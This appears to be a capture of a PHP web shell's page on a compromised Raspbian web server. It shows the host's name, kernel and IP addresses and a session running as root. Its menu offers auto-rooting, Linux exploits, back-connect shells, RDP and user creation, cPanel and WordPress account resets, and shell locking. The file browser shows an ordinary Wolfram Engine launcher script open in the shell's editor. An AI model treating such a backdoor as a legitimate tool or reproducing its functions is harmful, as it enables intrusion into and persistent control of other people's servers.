Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
Wolfram /
WolframEngine /
12.2 /
Executables /
[ HOME SHELL ]
Name
Size
Permission
Action
MathKernel
2.87
KB
-rwxr-xr-x
Mathematica
3.84
KB
-rwxr-xr-x
WolframFrontEnd
3.84
KB
-rwxr-xr-x
WolframKernel
2.87
KB
-rwxr-xr-x
math
2.87
KB
-rwxr-xr-x
mathematica
3.84
KB
-rwxr-xr-x
mcc
1.98
KB
-rwxr-xr-x
wolfram
2.87
KB
-rwxr-xr-x
wolframfrontend
3.84
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mcc
#!/bin/sh # # MathLink compiler command file # Copyright 1988-2021 Wolfram Research, Inc. # Make certain that ${PATH} includes /usr/bin and /bin PATH="${PATH}:/usr/bin:/bin" # Determine the SystemID by examining the output of `uname -s` and # `uname -m`. Failsafe to SystemIDList=Unknown. case `uname -s` in Linux) case `uname -m` in ia64) SystemIDList="Linux-IA64";; i?86) SystemIDList="Linux";; x86_64) SystemIDList="Linux-x86-64 Linux";; armv?l) SystemIDList="Linux-ARM";; *) SystemIDList="Unknown";; esac;; *) SystemIDList="Unknown";; esac # Find the full pathname and name of this script. Script="${0}" ProgramName=`basename "${0}"` # If ${SystemIDList} = Unknown, print an error message and exit if [ "${SystemIDList}" = "Unknown" ]; then echo "${ProgramName} cannot determine operating system." exit 1 fi # Test to see if the script is being called via a symlink, if so, examine # the output of ls -l on the symlink to find the link target. Reset # ${Script}. LinkDirectory=`pwd` while `exec test -L "${Script}"`; do ScriptDirectory=`dirname "${Script}"` Script=`ls -l "${Script}" | sed -e 's/.*-> //g'` cd "${ScriptDirectory}" done ScriptDirectory=`dirname "${Script}"` ScriptDirectory=`cd "${ScriptDirectory}"; pwd` cd "${LinkDirectory}" # Determine $TopDirectory by removing "Executables" from # "${ScriptDirectory}". ScriptLeafDirectory="Executables" TopDirectory=`cd "${ScriptDirectory}"; pwd | \ sed -e 's/\/'"${ScriptLeafDirectory}"'//g'` for SystemID in $SystemIDList; do MCCPath="SystemFiles/Links/MathLink/DeveloperKit/${SystemID}/CompilerAdditions" MathLinkCC="${TopDirectory}/${MCCPath}/${ProgramName}" if [ ! -x "${MathLinkCC}" ]; then fail=1 continue else fail=0 break fi done if [ ! "${fail}" = "0" ]; then echo "MathLink Developers Kit not found. Check that you have" echo "installed the MathLink Developers kit for the system" echo "you are running on." exit 1 fi exec "${MathLinkCC}" "$@"
Close